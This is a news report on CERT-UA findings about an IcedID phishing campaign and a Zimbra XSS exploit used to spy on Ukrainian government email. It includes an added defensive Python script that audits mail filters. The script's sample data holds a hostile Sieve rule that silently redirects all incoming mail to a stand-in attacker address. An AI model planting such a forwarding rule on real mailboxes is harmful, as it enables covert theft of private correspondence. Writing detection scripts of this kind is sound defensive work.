Hackers are launching new assaults against Ukrainian government entities, using Zimbra exploits and phishing attacks to spread the IcedID malware.
The new attacks were discovered by Ukraine’s Computer Emergency Response Team (CERT-UA), which attributed the IcedID phishing campaign to the UAC-0041 threat cluster, previously linked to AgentTesla distribution, and the Zimbra campaign to UAC-0097, a currently unknown actor.
Although the attributions are tentative, this is yet another example of hostile cyber-activity directed at Ukrainian organizations.
The threat actors’ purpose in both incidents is to acquire access to internal networks in order to conduct cyber-espionage on Ukraine’s most important government organizations.
IcedID is infecting state organizations
The first report details a campaign that distributed “Mobilization Register.xls” XLS documents to numerous people.
When the user opens the document, it asks them to “Enable the Content” in order to read it; doing so runs a malicious macro that downloads and executes a malicious file.
That file is the GzipLoader malware, which fetches, decrypts, and executes the final payload, IcedID (aka BankBot).
IcedID is a banking trojan that can be used to steal account credentials or as a loader for other malware such as Cobalt Strike, ransomware, wipers, and more.
Surveillance of government emails
The second report concerns an email sent to Ukrainian government organizations with photographs apparently from an event when President V. Zelensky congratulated soldiers of the Armed Forces.
The Zimbra cross-site scripting flaw exploited in that email affects Zimbra Collaboration Suite versions 8.7 and older; it allows remote attackers to inject arbitrary web script or HTML into email attachments via the Content-Location header.
Zimbra is a cloud-based email and collaboration platform with features like instant messaging, contacts, video conferencing, file sharing, and cloud storage.
Exploiting the issue in this scenario adds a rule that forwards the victim’s emails to a new address under the threat actor’s control, giving the attacker ongoing access to the mailbox for espionage.
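One way to hunt for the forwarding rule described above is to audit each account’s mail filters for redirect actions that point outside the organisation. The following Python script is an added example, not code from CERT-UA or the article; it assumes Zimbra stores per-account filters as a Sieve script in the zimbraMailSieveScript attribute, and the sample script, addresses and domains in it are constructed.

```python
import re
from typing import Dict, List

# Constructed sample of one account's Sieve filter script. Assumption: Zimbra keeps
# per-account filters as Sieve in the zimbraMailSieveScript attribute (readable with
# `zmprov ga <account> zimbraMailSieveScript`); all addresses here are made up.
# The last rule has the shape of the forwarding rule described in the article.
SAMPLE_SIEVE = '''
require ["fileinto", "copy"];
# legitimate user rule
if header :contains "subject" "newsletter" {
    fileinto "Newsletters";
}
# legitimate forward to a colleague in the same organisation
if address :is "to" "archive@example.gov.ua" {
    redirect :copy "records@example.gov.ua";
}
if true {
    redirect :copy "collector@attacker.example";
}
'''

# Matches a Sieve redirect action and captures its target address; the lazy
# [^;]*? skips modifiers such as :copy without crossing into the next action.
REDIRECT_RE = re.compile(r'\bredirect\b[^;]*?"([^"\s]+@[^"\s]+)"', re.IGNORECASE)


def strip_comments(script: str) -> str:
    """Drop Sieve '#' line comments so commented-out rules are not reported."""
    return re.sub(r"#[^\n]*", "", script)


def find_redirects(script: str) -> List[str]:
    """Return every address that a redirect action in the script sends mail to."""
    return REDIRECT_RE.findall(strip_comments(script))


def audit_forwarding(script: str, trusted_domains: List[str]) -> List[Dict[str, object]]:
    """Report each redirect target, marking external ones and unconditional ('if true')
    rules; an unconditional external redirect silently copies every incoming message."""
    trusted = {d.lower() for d in trusted_domains}
    cleaned = strip_comments(script)
    findings = []
    for match in REDIRECT_RE.finditer(cleaned):
        addr = match.group(1)
        domain = addr.rsplit("@", 1)[1].lower()
        # the nearest 'if <test> {' before the action is the rule's condition
        tests = re.findall(r"\bif\s+(.+?)\s*\{", cleaned[: match.start()])
        unconditional = bool(tests) and tests[-1].strip() == "true"
        findings.append({"address": addr, "external": domain not in trusted,
                         "unconditional": unconditional})
    return findings


if __name__ == "__main__":
    for finding in audit_forwarding(SAMPLE_SIEVE, ["example.gov.ua"]):
        print(finding)
```

In practice the script would be run over every account’s exported filter script, with the organisation’s own mail domains as the trusted list.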
It’s worth noting that Zimbra had an XSS issue earlier this year that affected the suite’s most recent 8.8.15 P29 & P30 editions.
Chinese threat actors extensively exploited that issue as a zero-day, stealing the emails of European media and government institutions.
As a result, CERT-UA urges all Zimbra-using enterprises in Ukraine to upgrade to the newest available versions of the suite as soon as possible.